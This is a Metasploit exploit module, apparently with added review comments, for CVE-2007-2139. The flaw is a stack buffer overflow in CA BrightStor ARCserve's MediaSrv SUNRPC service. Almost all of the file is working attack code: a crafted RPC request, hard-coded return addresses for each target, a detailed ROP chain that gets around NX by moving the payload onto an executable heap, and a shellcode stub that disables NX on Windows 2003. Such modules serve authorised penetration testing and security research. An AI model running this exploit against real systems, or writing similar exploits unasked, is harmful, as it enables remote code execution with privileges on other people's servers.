
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # AverageRanking: the return addresses and offsets below are hard-coded per
  # product version / OS, so success depends on matching the right target.
  Rank = AverageRanking

  # Provides sunrpc_create / sunrpc_call / sunrpc_destroy used in #exploit.
  include Msf::Exploit::Remote::SunRPC

  # Module metadata.
  #
  # Two families of targets exist. The Windows 2000/2003 targets carry an
  # 'Off' (where the payload and the return-address trampoline are written in
  # the non-NX path of #exploit) and a 'Ret'. The "NX Support" target's 'Ret'
  # (0x41414141) is a placeholder: the NX branch of #exploit never reads
  # target.ret and instead uses its own list of fixed addresses.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CA BrightStor ArcServe Media Service Stack Buffer Overflow',
      'Description' => %q{
        This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA
        BrightStor ARCserve. By sending a specially crafted SUNRPC request, an attacker
        can overflow a stack buffer and execute arbitrary code.
      },
      'Author' => [ 'toto' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2007-2139'],
          [ 'OSVDB', '35326' ],
          [ 'BID', '23635'],
          [ 'ZDI', '07-022'],
        ],
      'Privileged' => true,
      'Platform' => 'win',
      'Payload' =>
        {
          # Both request layouts in #exploit leave more room than this; the
          # declared space is the bound the payload encoder is held to.
          'Space' => 0x300,
          # '_' is excluded because #exploit uses it as the field separator
          # around the request body ("_" + data + "_1_1..."). The remaining
          # bytes are presumably those the server's string handling would cut
          # or alter on the way to the vulnerable copy — TODO confirm.
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c_",
          'Prepend' =>
            # Disable NX on 2k3 to upload data on the stack
            # (service crashes if the stack is switched to the heap)
            # The stub reads the OS version from the PEB and only acts when it
            # sees MajorVersion 5 / MinorVersion 2 with a build above 0xece;
            # on any other version it falls through to the payload untouched.
            "\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB
            "\x83\xb9\xa4\x00\x00\x00\x05" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5
            "\x75\x30" + # jnz after
            "\x83\xb9\xa8\x00\x00\x00\x02" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2
            "\x75\x27" + # jnz after
            "\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)
            "\x76\x1b" + # jbe after
            "\x8d\x89\xa8\x00\x00\x00" + # lea ecx, [ecx+0xa8]
            "\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
            "\xb8\xed\x00\x00\x00" + # mov eax, 0xed
            "\x6a\x04" + # push 4
            "\x51" + # push ecx
            "\x6a\x22" + # push 22
            "\x6a\xff" + # push -1
            "\x6a\xff" + # push -1 (padding)
            "\xff\x12", # call dword ptr[edx]
          # Move ESP well away from the payload before it runs so its own
          # pushes do not overwrite the bytes still being executed.
          'StackAdjustment' => -10000,

        },
      'Targets' =>
        [
          # 'Off' is where the payload lands in the non-NX request; the
          # trampoline (jmp +6 / ret / jmp back) is written at Off + 0x73c.
          ['BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2000)', { 'Ret' => 0x1002b715 , 'Off' => 0x304} ],
          ['BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2003)', { 'Ret' => 0x1002b715 , 'Off' => 0x300} ],
          # Placeholder 'Ret': the NX branch of #exploit does not use target.ret.
          ['BrightStor Arcserve 11.1 - 11.5 SP2 (Windows All - NX Support)', { 'Ret' => 0x41414141 } ],
        ],
      'DisclosureDate' => '2007-04-25',
      'DefaultTarget' => 0
    ))
  end

  # Builds the oversized request and sends it to the MediaSrv SUNRPC service.
  #
  # Connection: TCP, RPC program 0x6097e, version 1; the body is XDR-encoded
  # and sent as procedure 0xf5. Two request layouts are built depending on
  # the selected target:
  #   * "NX Support" target — a 0x600-byte buffer seeded with a fixed chain of
  #     return addresses (walked through in the step comments below); the
  #     payload is placed at offset 0x260.
  #   * Windows 2000/2003 targets — a 0xA64-byte buffer with the payload at
  #     target['Off'] and a short trampoline plus target.ret at Off + 0x73c.
  # After the call the module waits 20 seconds, tears the RPC state down and
  # lets the payload handler run. Errors from the call are deliberately
  # ignored (see the rescue below).
  def exploit
    sunrpc_create('tcp', 0x6097e, 1)

    if target.name =~ /NX/
      # summary:
      #
      # 1) get the payload address
      # 2) copy the payload into a fixed buffer (data section)
      # 3) allocate an executable heap buffer (to bypass NX)
      # 4) copy back the payload into the heap
      # 5) jmp to the payload in the heap
      #
      # step 1: jmp around the atoi pointers
      #
      # add esp, 20h
      # retn
      #
      # step 2: get a pointer to the stack in ecx
      #
      # xor eax, eax
      # mov ecx, dword ptr fs:[0]
      # cmp dword ptr [ecx+4], offset __unwind_handler
      # jnz end
      # [...]
      # end:
      # retn
      #
      # step 3: mov the stack pointer in eax
      #
      # mov eax, ecx
      # add esp, 20h
      # retn
      #
      # step 4: set fffff824h in esi
      #
      # pop esi
      # retn
      #
      # step 5: add esi to eax (eax points to the payload in the stack)
      #
      # add eax, esi
      # pop esi
      # retn
      #
      # step 6: set edi to a buffer we can write (6d515301h)
      #
      # pop edi
      # retn
      #
      # step 7: copy the payload to the buffer
      #
      # push eax
      # push edi
      # call _strcpy_0
      # pop ecx
      # pop ecx
      # retn
      #
      # step 8: set ecx to ffffffh
      #
      # pop ecx
      # retn
      #
      # step 9: mov ecx to eax (ffffffff -> MEM_EXECUTABLE)
      #
      # mov eax, ecx
      # add esp, 20h
      # retn
      #
      # step 10: create an executable heap
      #
      # push 0
      # cmp [esp+4+arg_0], eax
      # push 1000h
      # setz al
      # push eax
      # call ds:HeapCreate ; create a new heap (executable for NX)
      # test eax, eax
      # mov hHeap, eax
      # jz short loc_6d5071b5
      # call ___sbh_heap_init
      # test eax, eax
      # jnz short loc_6d5071b8
      # push hHeap
      # call ds:HeapDestroy
      # loc_6d5071b5:
      # xor eax, eax
      # retn
      # loc_6d5071b8:
      # push 1
      # pop eax
      # retn
      #
      # step 11: Allocate a new heap buffer (size 01060101h)
      #
      # push hHeap
      # call ds:HeapAlloc
      # pop edi
      # pop esi
      # retn
      #
      # step 12: set esi to the buffer containing the payload (6d515301h)
      #
      # pop esi
      # retn
      #
      # step 13: copy the payload to the heap (executable)
      #
      # push esi
      # push eax
      # call _strcpy_0
      # pop ecx
      # pop ecx
      # pop esi
      # retn
      #
      # step 14: go to the heap
      #
      # call eax
      #
      # step 15:
      # if 2k3 the prepend data disables NX to upload and execute
      # data on the stack
      #
      # step 16: w00t!

      # Alphanumeric filler; every slot not overwritten below stays random.
      # The "ret N" markers correspond to the numbered steps above.
      data = Rex::Text.rand_text_alphanumeric(0x600)

      # ret 1
      data[ 0x100, 4 ] = [ 0x6d5010e4 ].pack('V')

      # used to store the result of atoi
      data[ 0x108, 4 ] = [ 0x6d51652b ].pack('V')
      data[ 0x10C, 4 ] = [ 0x6d51652b ].pack('V')
      data[ 0x110, 4 ] = [ 0x6d51652b ].pack('V')
      data[ 0x114, 4 ] = [ 0x6d51652b ].pack('V')
      data[ 0x118, 4 ] = [ 0x6d51652b ].pack('V')
      data[ 0x11C, 4 ] = [ 0x6d51652b ].pack('V')

      # ret 2
      data[ 0x124, 4 ] = [ 0x6d50b27a ].pack('V')

      # ret 3
      data[ 0x128, 4 ] = [ 0x6d5010e2 ].pack('V')

      # ret 4
      data[ 0x14C, 4 ] = [ 0x6d50aa6d ].pack('V')
      data[ 0x150, 4 ] = [ 0xfffff824 ].pack('V')

      # ret 5
      data[ 0x154, 4 ] = [ 0x6d50aa6b ].pack('V')

      # ret 6
      data[ 0x15C, 4 ] = [ 0x6d5057a0 ].pack('V')
      data[ 0x160, 4 ] = [ 0x6d515301 ].pack('V')

      # ret 7
      data[ 0x164, 4 ] = [ 0x6d50b938 ].pack('V')

      # ret 8
      data[ 0x178, 4 ] = [ 0x6d502df0 ].pack('V')
      data[ 0x17C, 4 ] = [ 0xffffffff ].pack('V')

      # ret 9
      data[ 0x180, 4 ] = [ 0x6d5010e2 ].pack('V')

      # ret 10
      data[ 0x1a4, 4 ] = [ 0x6d507182 ].pack('V')

      # ret 11
      data[ 0x1a8, 4 ] = [ 0x6d505c2c ].pack('V')
      data[ 0x1ac, 4 ] = [ 0xffffffff ].pack('V')
      data[ 0x1b0, 4 ] = [ 0x01060101 ].pack('V')

      # ret 12
      data[ 0x1bc, 4 ] = [ 0x6d50aa6d ].pack('V')
      data[ 0x1c0, 4 ] = [ 0x6d515301 ].pack('V')

      # ret 13
      data[ 0x1c4, 4 ] = [ 0x6d50f648 ].pack('V')

      # ret 14
      data[ 0x1cc, 4 ] = [ 0x6d506867 ].pack('V')

      # Encoded payload (already carries the Prepend stub) at a fixed offset.
      data[ 0x260 , payload.encoded.length ] = payload.encoded

    else
      # Non-NX layout: payload at the per-target offset, followed by a
      # trampoline 0x73c bytes later: "jmp +6", the target return address,
      # then a "jmp" back towards the payload.
      data = Rex::Text.rand_text_alphanumeric(0xA64)
      off = target['Off']

      data[ off, payload.encoded.length] = payload.encoded
      data[ off + 0x73c, 2 ] = "\xeb\x06"
      data[ off + 0x740, 4 ] = [ target.ret ].pack('V')
      data[ off + 0x744, 5 ] = "\xe9\xb7\xf8\xff\xff"
    end

    # '_' frames the body and separates the trailing fields; this is why it
    # is listed in BadChars in #initialize.
    data = "_" + data + "_1_1_1_1_1_1_1_1_1"

    request = Rex::Encoder::XDR.encode(1, 1, 2, 2, 2, data, 3, 3)

    print_status("Trying target #{target.name}...")

    begin
      # NOTE(review): `ret` is assigned but never read.
      ret = sunrpc_call(0xf5, request)
      # 20-second wait before tearing the connection down — presumably to give
      # the payload time to run before the socket closes; confirm.
      select(nil,nil,nil,20)
    rescue
      # Best-effort by design: any StandardError from the call or the wait is
      # swallowed so that sunrpc_destroy / handler / disconnect still run.
      # NOTE(review): logging the error (e.g. via vprint_error) would help
      # when debugging a failed attempt.
    end

    sunrpc_destroy

    # Let the payload handler pick up any session, then close the socket.
    handler
    disconnect

  end
end